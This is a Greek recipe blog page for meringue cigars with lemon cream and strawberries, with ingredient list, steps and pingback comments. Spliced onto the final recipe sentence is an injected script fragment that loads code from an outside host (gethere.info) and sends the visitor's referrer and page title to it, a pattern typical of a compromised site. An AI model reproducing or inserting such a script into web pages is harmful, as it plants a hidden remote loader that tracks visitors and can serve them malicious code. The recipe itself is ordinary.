mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Πουράκια μαρέγκας με κρέμα λεμόνι και φράουλες

Πουράκια μαρέγκας με κρέμα λεμόνι και φράουλες

IMG_5022Ένα γλυκάκι πάντα μας κλείνει την όρεξη μετά το φαγητό!

Ειδικά όταν είναι δροσιστικό είναι η τελευταία πινελιά για την χώνεψη! Το μυστικό στα γλυκά είναι να φτιάχνονται από φρέσκα υλικά και να είναι όμορφα σερβιρισμένα! Αυτή η συνταγή συνδυάζει και τα δύο και συγχρόνως μας χαρίζει ένα γευστικό ταξίδι στα χρώματα και στη δροσιά της Άνοιξης!

Υλικά395394

για τα πούρα μαρέγκας
4 μεγάλα αυγά
1/4 κ. γλ. αλάτι
1 φλιτζ. ζάχαρη
3 κ. σ. ψιλοκομμένα φιστίκια

για την κρέμα λεμόνι

2 κ.γλ. ξύσμα λεμονιού
1/2 φλιτζ. χτμό λεμονιού
1/2 φλιτζ. ζάχαρη
3 μεγάλα αυγά
6 κ.σ. βούτυρο κομμένο σε κομμάτια
1 φλιτζ. κρέμα γάλακτος
1/2 φλιτζ. ζάχαρη άχνη
300 γραμ. φράουλες σε κομμάτια

Εκτέλεση

για τα πουράκια μαρέγκας

1. Προθερμαίνουμε το φούρνο στους 100 βαθμούς
2. Βάζουμε σε ένα ταψάκι μια λαδόκολλα και το αφήνουμε μέσα στο φούρνο
3. Χτυπάμε τα ασπράδια πολύ καλό σε ένα δυνατό μίξερ σε μεγάλη ταχύτητα
4. Σταδιακά προσθέτουμε τη ζάχαρη και συνεχίζουμε να τα χτυπάμε σε υψηλή ταχύτητα μέχρι να γίνει η μαρέγκα σφιχτή.
5. Χρησιμοποιούμε σακούλες ζαχαροπλαστικής κια φτιάχνουμε με τη μαρέγκα μας μικρά πουράκια
6. Τα τοποθετούμε στη λαδόκολλα με προσοχή και έτσι ώστε να απέχουν μεταξύ τους τουλάχιστον 3 εκατοστά
7. Πασπαλίζουμε απαλά με τα φιστίκια
8. Ψήνουμε τα πουράκια μαρέγκας στο φούρνο για 2 ώρες περίπου μέχρι να γίνουν τραγανά.
9. Σβήνουμε το φούρνο και αφήνουμε τα πουράκια μας να κρυώσουν για μια ώρα μέσα στο φούρνο και μετά τα βγάζουμε έξω μέχρι να κρυώσουν τελείως.

για την κρέμα λεμονιού

Όσο τα πουράκια μας ψήνονται κάνουμε την κρέμα λεμονιού
1. Παίρνουμε ένα κατσαρολάκι και βάζουμε το ξύσμα λεμονιού, το χυμό, τη ζάχαρη και τα αυγά και ανακατεύουμε
2. Προσθέτουμε το βούτυρο και τα μαγειρεύουμε σε χαμηλή φωτιά ανακατεύοντας συχνά μέχρι να λιώσει το βούτυρο.
3. Μαγειρεύουμε για 9 λεπτά μέχρι να γίνει η κρέμα μας παχιά
4. Έπειτα ρίχνουμε την κρέμα σε ένα μπωλ περνώντας την από σουρωτήρι και τη σκεπάζουμε για να κρυώσει για καμιά ώρα.
5. Μετά χτυπάμε την κρέμα γάλακτος και τη ζάχαρη άχνη σε ένα άλλο μπωλ με καθαρό χτυπητήρι μέχρι το μείγμα μας να είναι μαλακό.
6. Έπειτα ενσωματώνουμε το ⅓ κρέμα γάλακτος με απαλές κινήσεις στην κρέμα λεμονιού μέχρι να ανοίξει το χρώμα και μετά βάζουμε και την υπόλοιπη.
7. Στολίζουμε με τις φράουλες και τα πουράκια μαρέγκας!

Τα πουράκια μας μπορούμε να τα έχουμε φτιάξει 2-3 μέρες πριν και να τα έχουμε φυλάξει αεροστεγώς σε ένα τάπερs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Share This
3 Σχόλια
  1. […] post Πουράκια μαρέγκα&si… appeared first on Arkoudos, Συνταγές … […]

  2. […] Πουράκια μαρέγκα&si… […]

  3. […] Πουράκια μαρέγκας με κρέμα λεμόνι και φράουλες […]